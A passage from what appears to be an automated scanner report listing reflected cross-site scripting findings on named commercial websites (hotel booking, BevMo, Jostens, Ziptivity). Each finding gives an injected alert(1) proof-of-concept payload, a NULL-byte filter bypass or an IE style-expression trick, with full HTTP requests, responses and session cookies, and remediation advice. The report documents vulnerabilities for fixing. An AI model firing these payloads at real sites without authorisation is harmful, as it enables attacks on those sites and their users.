The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=857259%0aalert(1)//e3871f293d&66d04%22%3balert(1)//0e2b4395118=1 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://booking.ihotelier.com/istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8&66d04%22%3balert(1)//0e2b4395118=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Chrome-13171=b92fde37-91ac-4001-a0e6-6a9f7298e762; JSESSIONID=33ED9B4F1F168F700648335690BB5AD3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7868
Date: Tue, 25 Oct 2011 02:08:04 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm34 at Mon Oct 24 21:08:04 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
= {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011&Adults=1&LanguageID=1&HotelID=13171&66d04";alert(1)//0e2b4395118=1&submit.y=857259
alert(1)//e3871f293d
&submit.x=54&Children=0&Rooms=1&Length=2&",
langID : "1",
portal : "",
sessionID : "b92fde37-91ac-4001-a0e6-6a9f7298e762"
};
       </script
...[SNIP]...

1.12. https://booking.ihotelier.com/istay/istay.jsp [submit.y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the submit.y request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae3f6"%3balert(1)//d122b6a814a was submitted in the submit.y parameter. This input was echoed as ae3f6";alert(1)//d122b6a814a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8ae3f6"%3balert(1)//d122b6a814a HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7839
Date: Tue, 25 Oct 2011 02:05:42 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm31 at Mon Oct 24 21:05:42 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
endChild(se);
           var reqParams = {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011&Adults=1&LanguageID=1&HotelID=13171&submit.y=8ae3f6";alert(1)//d122b6a814a&submit.x=54&Children=0&Rooms=1&Length=2&",
langID : "1",
portal : "",
sessionID : "6c1b8dc7-db24-4b62-a842-eeda205ed971"
};
       </script
...[SNIP]...

1.13. http://www.bevmo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bevmo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8c23'-alert(1)-'dc2ad7b7a2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f8c23'-alert(1)-'dc2ad7b7a2b=1 HTTP/1.1
Host: www.bevmo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.bevmo.com//Default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=w3voga55gdjwu445ezfhuor5; BevMoSessionInfo=Wk5VandydlBtT1l3YmU0aDVpc2JaYS9kQVRXekcvRXljU0pCRlVRMEJYcm1qSGU4TEwrM3ZVZTd4azZnRHU0bDBJa3doZTJranpMWStWRHRSNXIweGc9PQ==; __utma=78697607.168149472.1319479460.1319479460.1319479460.1; __utmb=78697607.2.9.1319479460; __utmc=78697607; __utmz=78697607.1319479460.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDSSBRASSC=MPJHIJMCCGDOFBALAIIGJDNO

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 24 Oct 2011 18:04:36 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR DEVo TAIi PSAo PSDo IVAi IVDi CONi HISi OUR LEG PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: BevMoSessionInfo=Wk5VandydlBtT1l3YmU0aDVpc2JaYS9kQVRXekcvRXljU0pCRlVRMEJYcm1qSGU4TEwrM3ZVZTd4azZnRHU0bDBJa3doZTJranpMWStWRHRSNXIweGc9PQ==; domain=.bevmo.com; expires=Wed, 23-Nov-2011 19:04:36 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 134672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns
...[SNIP]...

$('#fulfillmenterrors').show();
}
}

//If successfull then undate the display.
function OnFulfillmentSuccess(response) {
   
var reloadPage = 'http://www.bevmo.com/Default.aspx?f8c23'-alert(1)-'dc2ad7b7a2b=1';
   var FulfillmentDesc = 'Please Select';
   
   //Update the dropdown display.
   if ($('#ctl00_uxMainHeader_uxFulFillmentSelect_uxFulfillmentPickup').is(':checked')) {
FulfillmentDesc = 'Store P
...[SNIP]...

1.14. http://www.bevmo.com//Default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bevmo.com
Path:   //Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fec5c'-alert(1)-'bf1be2f7fbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //Default.aspx?fec5c'-alert(1)-'bf1be2f7fbf=1 HTTP/1.1
Host: www.bevmo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 24 Oct 2011 18:04:24 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR DEVo TAIi PSAo PSDo IVAi IVDi CONi HISi OUR LEG PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: BevMoSessionInfo=Wk5VandydlBtT1l3YmU0aDVpc2JaYS9kQVRXekcvRXljU0pCRlVRMEJYcm1qSGU4TEwrM3ZVZTd4azZnRHU0bDBJa3doZTJranpMWStWRHRSNXIweGc9PQ==; domain=.bevmo.com; expires=Wed, 23-Nov-2011 19:04:24 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 134672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns
...[SNIP]...

$('#fulfillmenterrors').show();
}
}

//If successfull then undate the display.
function OnFulfillmentSuccess(response) {
   
var reloadPage = 'http://www.bevmo.com/Default.aspx?fec5c'-alert(1)-'bf1be2f7fbf=1';
   var FulfillmentDesc = 'Please Select';
   
   //Update the dropdown display.
   if ($('#ctl00_uxMainHeader_uxFulFillmentSelect_uxFulfillmentPickup').is(':checked')) {
FulfillmentDesc = 'Store P
...[SNIP]...

1.15. http://www.bevmo.com/ScriptResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bevmo.com
Path:   /ScriptResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1ccf'-alert(1)-'5e3911f129c was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScriptResource.axd?d=qVSOJ6c7BI0Jm9qERPZsd6QO2RjPflyrDkRVo0sAMEV2WWsPYuG4KGanntgVYVFr7I50JNHNXRT9lUx2fXypnBVq1PFj1zrn-Sm_v1yuDiVsostxl09xbAOv38tclpueyF_Kc_PqLOZ8saFEjoxukmpm9vc1f1ccf'-alert(1)-'5e3911f129c&t=634550446931609184 HTTP/1.1
Host: www.bevmo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.bevmo.com//Default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=w3voga55gdjwu445ezfhuor5; BevMoSessionInfo=Wk5VandydlBtT1l3YmU0aDVpc2JaYS9kQVRXekcvRXljU0pCRlVRMEJYcm1qSGU4TEwrM3ZVZTd4azZnRHU0bDBJa3doZTJranpMWStWRHRSNXIweGc9PQ==

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR DEVo TAIi PSAo PSDo IVAi IVDi CONi HISi OUR LEG PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: BevMoSessionInfo=Wk5VandydlBtT1l3YmU0aDVpc2JaYS9kQVRXekcvRXljU0pCRlVRMEJYcm1qSGU4TEwrM3ZVZTd4azZnRHU0bDBJa3doZTJranpMWStWRHRSNXIweGc9PQ==; domain=.bevmo.com; expires=Wed, 23-Nov-2011 19:04:40 GMT; path=/; HttpOnly
Date: Mon, 24 Oct 2011 18:04:39 GMT
Content-Length: 96479

<!--

Logged: True

Error:

-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
= 'http://www.bevmo.com/ScriptResource.axd?d=qVSOJ6c7BI0Jm9qERPZsd6QO2RjPflyrDkRVo0sAMEV2WWsPYuG4KGanntgVYVFr7I50JNHNXRT9lUx2fXypnBVq1PFj1zrn-Sm_v1yuDiVsostxl09xbAOv38tclpueyF_Kc_PqLOZ8saFEjoxukmpm9vc1f1ccf'-alert(1)-'5e3911f129c&t=634550446931609184';
   var FulfillmentDesc = 'Please Select';
   
   //Update the dropdown display.
   if ($('#ctl00_uxMainHeader_uxFulFillmentSelect_uxFulfillmentPickup').is(':checked')) {
Fulfill
...[SNIP]...

1.16. http://www.bevmo.com/WebResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bevmo.com
Path:   /WebResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 522f0'-alert(1)-'8218c8ad6ae was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /WebResource.axd?d=Vn8XX9cbfEbHFFMgO_EIUneRK2kJYVL41HhxuX8lBR2lAunG1cpMCTmt65yIAubj0q011Z9BZeDmkstLfRNQjkj9uLo1522f0'-alert(1)-'8218c8ad6ae&t=634550446931609184 HTTP/1.1
Host: www.bevmo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.bevmo.com//Default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=w3voga55gdjwu445ezfhuor5; BevMoSessionInfo=Wk5VandydlBtT1l3YmU0aDVpc2JaYS9kQVRXekcvRXljU0pCRlVRMEJYcm1qSGU4TEwrM3ZVZTd4azZnRHU0bDBJa3doZTJranpMWStWRHRSNXIweGc9PQ==

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR DEVo TAIi PSAo PSDo IVAi IVDi CONi HISi OUR LEG PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: BevMoSessionInfo=Wk5VandydlBtT1l3YmU0aDVpc2JaYS9kQVRXekcvRXljU0pCRlVRMEJYcm1qSGU4TEwrM3ZVZTd4azZnRHU0bDBJa3doZTJranpMWStWRHRSNXIweGc9PQ==; domain=.bevmo.com; expires=Wed, 23-Nov-2011 19:04:40 GMT; path=/; HttpOnly
Date: Mon, 24 Oct 2011 18:04:40 GMT
Content-Length: 95968

<!--

Logged: True

Error:

-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
.
function OnFulfillmentSuccess(response) {
   
var reloadPage = 'http://www.bevmo.com/WebResource.axd?d=Vn8XX9cbfEbHFFMgO_EIUneRK2kJYVL41HhxuX8lBR2lAunG1cpMCTmt65yIAubj0q011Z9BZeDmkstLfRNQjkj9uLo1522f0'-alert(1)-'8218c8ad6ae&t=634550446931609184';
   var FulfillmentDesc = 'Please Select';
   
   //Update the dropdown display.
   if ($('#ctl00_uxMainHeader_uxFulFillmentSelect_uxFulfillmentPickup').is(':checked')) {
Fulfill
...[SNIP]...

1.17. http://www.jostens.com/apps/shop/yrbk_flash.asp [desiredPackage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jostens.com
Path:   /apps/shop/yrbk_flash.asp

Issue detail

The value of the desiredPackage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1c7d"%3balert(1)//fc00e6870e3 was submitted in the desiredPackage parameter. This input was echoed as e1c7d";alert(1)//fc00e6870e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/shop/yrbk_flash.asp?CID=156508&PFID=2011100705205134064&yr=2012&GID=2370410&desiredPackage=noe1c7d"%3balert(1)//fc00e6870e3&PID=2011100705205143064 HTTP/1.1
Host: www.jostens.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.jostens.com/apps/shop/yrbk_flash.asp?CID=156508&PFID=2011100705205134064&yr=2012&GID=2370410&desiredPackage=no&PID=2011100705205143064
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_shop_app_http=1192101898.34251.0000; affiliateIds=%7C1120371%7CA08773500%7C156508; affiliateName=Stowe Middle%2FHigh School; BIGipServerpool_commerce_services_http=386795530.37151.0000; BIGipServerpool_www.jostens.com_http=705562634.36895.0000; j_FPC=id=23ad5a41a28b9c622471319495099937:lv=1319495099937:ss=1319495099937; __utma=133671701.264416832.1319498700.1319498700.1319498700.1; __utmb=133671701.1.10.1319498700; __utmc=133671701; __utmz=133671701.1319498700.1.1.utmcsr=stowe.k12.vt.us|utmccn=(referral)|utmcmd=referral|utmcct=/SHS/SHS_promo02.htm; profileGuid=2671bcb4-28e0-43fa-b6a2-2e30fe140974; LeftNav=OracleNo=1120371&CID=156508&CustomerName=Stowe+Middle%2FHigh+School&PID=2011100705205143064&Org%5FType=K%5F12&CatalogName=2012+Yearbook&JunsNo=08773500&PPID=&GID=2370410&PFID=2011100705205134064; DInfo=odate2=&mdate=&odate1=&hasDates=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 28708
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: JSESSIONID=3ACD02729A463BA01BC21D181E551C7D; Path=/apps/profile
Set-Cookie: profileGuid=2671bcb4-28e0-43fa-b6a2-2e30fe140974; Path=/
Set-Cookie: LeftNav=OracleNo=1120371&CID=156508&PID=2011100705205143064&CustomerName=Stowe+Middle%2FHigh+School&Org%5FType=K%5F12&PPID=&CatalogName=2012+Yearbook&JunsNo=08773500&GID=2370410&PFID=2011100705205134064; domain=.jostens.com; path=/
From: owbswcpwa02
Date: Mon, 24 Oct 2011 23:25:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-885
...[SNIP]...
Detail%2Easp%3FCID%3D156508%26PFID%3D2011100705205134064%26GID%3D2370410%26PID%3D2011100705205143064%26Q%3D0%26backonly%3D1");

fo.addVariable("desiredPackage","noe1c7d";alert(1)//fc00e6870e3");
fo.addVariable("schoolPackage","");

fo.write("flashpanel")
</script>
...[SNIP]...

1.18. http://www.jostens.com/apps/shop/yrbk_flash.asp [desiredPackage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jostens.com
Path:   /apps/shop/yrbk_flash.asp

Issue detail

The value of the desiredPackage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26fe5"%3balert(1)//7ca62ee5906a011f6 was submitted in the desiredPackage parameter. This input was echoed as 26fe5";alert(1)//7ca62ee5906a011f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/shop/yrbk_flash.asp?CID=156508&PFID=2011100705205134064&yr=2012&GID=2370410&desiredPackage=no26fe5"%3balert(1)//7ca62ee5906a011f6&PID=2011100705205143064&YearbookGID=2370410 HTTP/1.1
Host: www.jostens.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.jostens.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.jostens.com/apps/shop/yrbk_catalog.asp?cid=156508&pfid=2011100705205134064&affiliateId=1120371
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_shop_app_http=1192101898.34251.0000; DInfo=odate2=&mdate=&odate1=&hasDates=; affiliateIds=%7C1120371%7CA08773500%7C156508; affiliateName=Stowe Middle%2FHigh School; BIGipServerpool_commerce_services_http=386795530.37151.0000; profileGuid=2671bcb4-28e0-43fa-b6a2-2e30fe140974; LeftNav=GID=&PFID=2011100705205134064&PPID=&JunsNo=08773500&CatalogName=2012+Yearbook&PID=&Org%5FType=K%5F12&CustomerName=Stowe+Middle%2FHigh+School&CID=156508&OracleNo=1120371; BIGipServerpool_www.jostens.com_http=705562634.36895.0000; j_FPC=id=23ad5a41a28b9c622471319495099937:lv=1319495099937:ss=1319495099937; __utma=133671701.264416832.1319498700.1319498700.1319498700.1; __utmb=133671701.1.10.1319498700; __utmc=133671701; __utmz=133671701.1319498700.1.1.utmcsr=stowe.k12.vt.us|utmccn=(referral)|utmcmd=referral|utmcct=/SHS/SHS_promo02.htm

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 28744
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: JSESSIONID=3C50ECE8A1E5820929451AE361AF2B9F; Path=/apps/profile
Set-Cookie: profileGuid=2671bcb4-28e0-43fa-b6a2-2e30fe140974; Path=/
Set-Cookie: LeftNav=OracleNo=1120371&CID=156508&PID=2011100705205143064&CustomerName=Stowe+Middle%2FHigh+School&Org%5FType=K%5F12&PPID=&CatalogName=2012+Yearbook&JunsNo=08773500&GID=2370410&PFID=2011100705205134064; domain=.jostens.com; path=/
From: owbswcpwa02
Date: Mon, 24 Oct 2011 23:25:30 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-885
...[SNIP]...
Detail%2Easp%3FCID%3D156508%26PFID%3D2011100705205134064%26GID%3D2370410%26PID%3D2011100705205143064%26Q%3D0%26backonly%3D1");

fo.addVariable("desiredPackage","no26fe5";alert(1)//7ca62ee5906a011f6");
fo.addVariable("schoolPackage","");

fo.write("flashpanel")
</script>
...[SNIP]...

1.19. http://ziptivity.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziptivity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64326'style%3d'x%3aexpression(alert(1))'258e37ce97f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64326'style='x:expression(alert(1))'258e37ce97f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?64326'style%3d'x%3aexpression(alert(1))'258e37ce97f=1 HTTP/1.1
Host: ziptivity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Oct 2011 17:57:07 GMT
Content-Length: 132081


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Ziptivity -
...[SNIP]...
<a class="topMenu fontGothic" href='/LogIn.aspx?ReturnUrl=http://ziptivity.com/default.aspx?64326'style='x:expression(alert(1))'258e37ce97f=1'>
...[SNIP]...

1.20. http://ziptivity.com/SearchPage.aspx [Distance parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziptivity.com
Path:   /SearchPage.aspx

Issue detail

The value of the Distance request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cc56c'style%3d'x%3aexpression(alert(1))'7193e8a3b2d was submitted in the Distance parameter. This input was echoed as cc56c'style='x:expression(alert(1))'7193e8a3b2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /SearchPage.aspx?Ziptivity=Ziptivity&Zip=01742&Distance=20cc56c'style%3d'x%3aexpression(alert(1))'7193e8a3b2d HTTP/1.1
Host: ziptivity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ziptivity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0vxv3zrztgid4nchrwsfa55; __utma=249806477.1558718341.1319479011.1319479011.1319479011.1; __utmb=249806477.1.10.1319479011; __utmc=249806477; __utmz=249806477.1319479011.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Oct 2011 18:09:53 GMT
Content-Length: 294300


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Ziptivity -
...[SNIP]...
<a class="topMenu fontGothic" href='/LogIn.aspx?ReturnUrl=http://ziptivity.com/SearchPage.aspx?Ziptivity=Ziptivity&Zip=01742&Distance=20cc56c'style='x:expression(alert(1))'7193e8a3b2d'>
...[SNIP]...

1.21. http://ziptivity.com/SearchPage.aspx [Zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziptivity.com
Path:   /SearchPage.aspx

Issue detail

The value of the Zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7711a'style%3d'x%3aexpression(alert(1))'f4297689048 was submitted in the Zip parameter. This input was echoed as 7711a'style='x:expression(alert(1))'f4297689048 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

